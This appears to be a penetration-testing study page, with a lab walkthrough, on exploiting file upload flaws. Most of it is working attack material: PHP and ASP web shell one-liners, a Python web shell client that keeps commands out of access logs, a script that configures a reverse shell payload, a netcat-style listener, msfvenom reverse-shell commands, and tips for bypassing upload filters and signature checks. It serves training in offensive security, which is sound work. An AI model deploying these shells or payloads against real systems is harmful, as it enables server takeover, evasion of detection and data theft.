Upload Exploitation
Core Technique: The final step in exploiting file upload vulnerabilities is deploying web shells and reverse shells for remote code execution
Overview
The final step in exploiting file upload vulnerabilities is to upload malicious scripts in the same language as the web application, such as web shells or reverse shell scripts. Once we upload our malicious script and visit its link, we can interact with it to take control over the back-end server.
Web Shells
Interactive Control: Web-based command execution interfaces for compromised servers
Using Existing Web Shells
We can find many excellent web shells online that provide useful features, like directory traversal or file transfer. One good option for PHP is phpbash, which provides a terminal-like, semi-interactive web shell.
SecLists Web Shell Collection:
Location: /opt/useful/seclists/Web-Shells/
Languages: PHP, ASP, ASPX, JSP, Perl, Python
Features: Various functionality levels from basic to advanced
Deployment Process
Download appropriate web shell for target language (PHP, ASP.NET, etc.)
Upload through vulnerable upload feature
Navigate to uploaded file location
Interact with the web shell interface
Example phpbash deployment:
# Upload phpbash.php through vulnerable upload form
# Access via: http://SERVER_IP:PORT/uploads/phpbash.php
Expected output:
www-data@target:/var/www/html/uploads$ whoami
www-data
www-data@target:/var/www/html/uploads$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Web Shell Advantages
Easy to use - Terminal-like interface
File management - Upload/download capabilities
Directory traversal - Navigate server filesystem
Command execution - Run system commands
Persistent access - Remains until removed
Writing Custom Web Shell
Manual Creation: Building simple but effective web shells when online tools aren't available
PHP Web Shell
Basic PHP Web Shell:
<?php system($_REQUEST['cmd']); ?>
Usage:
# Save as shell.php and upload
# Execute commands via: http://SERVER_IP:PORT/uploads/shell.php?cmd=id
Example execution:
# URL: http://SERVER_IP:PORT/uploads/shell.php?cmd=id
# Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Enhanced PHP Web Shell
Improved version with better formatting:
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
ASP.NET Web Shell
Basic .NET Web Shell:
<% eval request('cmd') %>
Usage:
# Save as shell.aspx and upload
# Execute commands via: http://SERVER_IP:PORT/uploads/shell.aspx?cmd=whoami
Note: eval request('cmd') is classic ASP (VBScript) syntax and only executes where IIS still hands the file to the classic ASP handler; if the target runs ASP.NET only, it will not compile inside an .aspx page, and an .aspx shell that spawns a process through System.Diagnostics.Process is needed instead. Try shell.asp as well as shell.aspx when the first does not execute.
Pro Tip: When using custom web shells in browsers, use source view (Ctrl+U) to see command output as it would appear in a terminal, without HTML rendering affecting the formatting.
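Once the one-liner is uploaded, driving it by hand through a browser gets old quickly and makes it easy to misread a failed upload as a broken command. The following added example (written for this page, not code from the original notes or from phpbash) wraps the minimal shell in a small Python client: it URL-encodes commands, sends them by POST (which $_REQUEST accepts and which keeps the command out of the access log's query string), strips the <pre> wrapper from the enhanced shell, and distinguishes three outcomes a tester must tell apart: the server returned the PHP source verbatim (the extension is not being executed), PHP ran but printed nothing (for example system() blocked by disable_functions), or real command output came back. SHELL_URL and the parameter name cmd are assumptions matching the Usage notes above.

```python
"""Minimal client for an uploaded  <?php system($_REQUEST['cmd']); ?>  web shell.

Added example for these notes; not part of the original page or of phpbash.
SHELL_URL and PARAM are assumed values for illustration.
"""
import re
import sys
import urllib.parse
import urllib.request

SHELL_URL = "http://SERVER_IP:PORT/uploads/shell.php"   # assumed upload location
PARAM = "cmd"                                            # assumed parameter name


def build_shell_url(base_url: str, cmd: str, param: str = PARAM) -> str:
    """GET form of a request. URL-encoding keeps spaces, slashes and shell
    metacharacters intact; typing them raw into a browser bar may not."""
    sep = "&" if urllib.parse.urlsplit(base_url).query else "?"
    return f"{base_url}{sep}{urllib.parse.urlencode({param: cmd})}"


def classify_response(body: str) -> str:
    """'source'   - PHP tags came back: the file is served as text, not executed,
                    so the upload worked but an execution bypass is still needed;
       'empty'    - PHP ran but produced nothing (command had no output, or
                    system() is disabled on the server);
       'executed' - command output was returned."""
    if re.search(r"<\?php", body):
        return "source"
    if not body.strip():
        return "empty"
    return "executed"


def extract_output(body: str) -> str:
    """Strip the <pre> wrapper added by the enhanced shell. system() does not
    HTML-escape command output, so nothing is unescaped here."""
    body = re.sub(r"^\s*<pre>", "", body)
    body = re.sub(r"</pre>\s*$", "", body)
    return body.strip("\n")


def run_command(cmd: str, base_url: str = SHELL_URL, param: str = PARAM,
                timeout: int = 10) -> tuple[str, str]:
    """Send one command via POST and return (classification, output).
    Network call: only exercised against a live target."""
    data = urllib.parse.urlencode({param: cmd}).encode()
    req = urllib.request.Request(base_url, data=data, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        body = resp.read().decode(errors="replace")
    return classify_response(body), extract_output(body)


def interactive(base_url: str = SHELL_URL) -> None:
    """Read-eval loop that makes the one-liner feel like a terminal."""
    while True:
        try:
            cmd = input("webshell> ")
        except EOFError:
            break
        if cmd.strip() in ("exit", "quit"):
            break
        status, out = run_command(cmd, base_url)
        if status == "source":
            print("[!] server returned PHP source: the file is not being executed",
                  file=sys.stderr)
        elif status == "empty":
            print("[!] empty response: no output, or system() is blocked", file=sys.stderr)
        else:
            print(out)


if __name__ == "__main__":
    interactive()
```

Run it with the real shell URL in place of SHELL_URL; a "source" classification on the very first command means the bypass work from the earlier upload stages is not finished yet, whatever the upload form said.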
Reverse Shell
Direct Connection: Establish a reverse connection back to the attacker machine for a full interactive shell
Using Existing Reverse Shell Scripts
Popular Reverse Shell Resources:
Pentestmonkey PHP Reverse Shell - Reliable and feature-rich
SecLists Reverse Shells - Multiple languages and frameworks
RevShells.com - Online reverse shell generator
Pentestmonkey PHP Reverse Shell Setup
Step 1: Download and Configure
# Download pentestmonkey PHP reverse shell
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
# Edit configuration (lines 49-50)
$ip = '10.10.14.55'; // CHANGE THIS - Your IP
$port = 4444; // CHANGE THIS - Your listening port
Step 2: Start Netcat Listener
nc -lvnp 4444
Step 3: Upload and Execute
# Upload php-reverse-shell.php through vulnerable upload form
# Navigate to: http://SERVER_IP:PORT/uploads/php-reverse-shell.php
# Reverse shell connection established
Expected Connection:
kabaneridev@htb[/htb]$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.55] from (UNKNOWN) [188.166.173.208] 35232
Linux target 4.15.0-72-generic #81-Ubuntu SMP Tue Nov 26 12:20:02 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
# id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
# whoami
www-data
Reverse Shell Advantages
Full interactive shell - Complete terminal functionality
Better stability - More reliable than web shells
Direct connection - No need for web interface
File transfer capabilities - Easy upload/download
Tunneling possibilities - Can tunnel other tools
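Steps 1 and 2 above (patch the $ip/$port lines, then start a listener) are the part of the reverse shell workflow that is easiest to get wrong under time pressure: a typo in the IP leaves the payload connecting nowhere, and nc is not always installed on the box you are working from. The following added example (written for this page; not part of the original notes or of pentestmonkey's script) rewrites the two configuration lines with input validation and refuses to continue if it did not find exactly one of each, and provides a dependency-free nc -lvnp substitute on top of the socket module. The sample PHP snippet embedded for testing is constructed to mirror the shape of those two lines; the listener relays stdin and uses select, so it is Unix-only.

```python
"""Prepare and catch a PHP reverse shell without hand-editing or nc.

Added example for these notes; not pentestmonkey's code. SAMPLE_CONFIG is a
constructed stand-in for the two '// CHANGE THIS' lines in php-reverse-shell.php.
"""
import ipaddress
import re
import select
import socket
import sys

SAMPLE_CONFIG = """<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
"""

IP_LINE = re.compile(r"^(\$ip\s*=\s*)'[^']*'(;.*)$", re.MULTILINE)
PORT_LINE = re.compile(r"^(\$port\s*=\s*)\d+(;.*)$", re.MULTILINE)


def configure_reverse_shell(source: str, ip: str, port: int) -> str:
    """Return the script with $ip and $port set to the listener. Validates the
    values first and insists on exactly one substitution each, so a changed
    file layout fails loudly instead of shipping an unconfigured payload."""
    ipaddress.IPv4Address(ip)                  # raises on a malformed address
    if not 1 <= port <= 65535:
        raise ValueError(f"port out of range: {port}")
    patched, n_ip = IP_LINE.subn(lambda m: f"{m.group(1)}'{ip}'{m.group(2)}", source)
    patched, n_port = PORT_LINE.subn(lambda m: f"{m.group(1)}{port}{m.group(2)}", patched)
    if n_ip != 1 or n_port != 1:
        raise ValueError(f"expected one $ip and one $port line, found {n_ip}/{n_port}")
    return patched


def write_payload(template_path: str, out_path: str, ip: str, port: int) -> None:
    """Read the downloaded php-reverse-shell.php, write the configured copy."""
    with open(template_path, encoding="utf-8") as f:
        src = f.read()
    with open(out_path, "w", encoding="utf-8") as f:
        f.write(configure_reverse_shell(src, ip, port))


def listen(port: int, host: str = "0.0.0.0") -> None:
    """Equivalent of `nc -lvnp PORT`: accept one connection and relay it to the
    terminal. Unix-only because select() is used on stdin."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen(1)
        print(f"listening on [{host}] {port} ...", file=sys.stderr)
        conn, addr = srv.accept()
        print(f"connect from {addr[0]} {addr[1]}", file=sys.stderr)
        with conn:
            while True:
                ready, _, _ = select.select([conn, sys.stdin], [], [])
                if conn in ready:
                    data = conn.recv(4096)
                    if not data:              # remote side closed
                        break
                    sys.stdout.buffer.write(data)
                    sys.stdout.buffer.flush()
                if sys.stdin in ready:
                    line = sys.stdin.buffer.readline()
                    if not line:              # Ctrl-D on our side
                        break
                    conn.sendall(line)


if __name__ == "__main__":
    # usage: python3 revshell_prep.py php-reverse-shell.php out.php 10.10.14.55 4444
    _, template, out, ip, port = sys.argv
    write_payload(template, out, ip, int(port))
    listen(int(port))
```

The payload still has to be uploaded and requested through the vulnerable form as in Step 3; this only removes the manual editing and the dependency on netcat.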
Generating Custom Reverse Shell Scripts
Automated Creation: Using msfvenom to generate custom reverse shell payloads
msfvenom Reverse Shell Generation
PHP Reverse Shell:
msfvenom -p php/reverse_php LHOST=10.10.14.55 LPORT=4444 -f raw > reverse.php
JSP Reverse Shell:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.55 LPORT=4444 -f raw > reverse.jsp
ASPX Reverse Shell:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.55 LPORT=4444 -f aspx > reverse.aspx
WAR Reverse Shell (Tomcat):
msfvenom -p java/shell_reverse_tcp LHOST=10.10.14.55 LPORT=4444 -f war > reverse.war
msfvenom Advantages
Bypass restrictions - Generated payloads do not match the signatures of well-known public shells (such as pentestmonkey's), so simple content filters may miss them
Multiple formats - Output formats such as raw, aspx, war and exe via -f
Custom encoding - Encoders (-e, for example php/base64) change the on-disk form of the payload
Framework specific - Payloads matched to the target stack (PHP, JSP, ASP.NET, Tomcat WAR)
HTB Academy Lab Solution
Target Information
Target:
Target: 94.237.49.23:52640
Objective: Upload web shell and retrieve /flag.txt
Technique: File upload exploitation
Step-by-Step Solution
Step 1: Create Simple Web Shell
<?php system($_REQUEST['cmd']); ?>
Step 2: Upload Web Shell
# Save as shell.php
# Upload through vulnerable upload form
# Note upload location (e.g., /uploads/)
Step 3: Execute Commands
# Access: http://94.237.49.23:52640/uploads/shell.php?cmd=id
# Test command execution works
# Find flag: http://94.237.49.23:52640/uploads/shell.php?cmd=cat /flag.txt
Expected Flag Format: HTB{...}
Alternative Approaches
If basic upload fails:
Try different extensions:
.phtml, .php3, .php4, .php5
Modify Content-Type: Change to image/jpeg while keeping PHP content
Add magic bytes: Prepend GIF89a to PHP code
Use reverse shell: Deploy pentestmonkey or msfvenom payload
This comprehensive approach to upload exploitation provides the foundation for compromising web applications through file upload vulnerabilities, leading to full server compromise through web shells or reverse shells.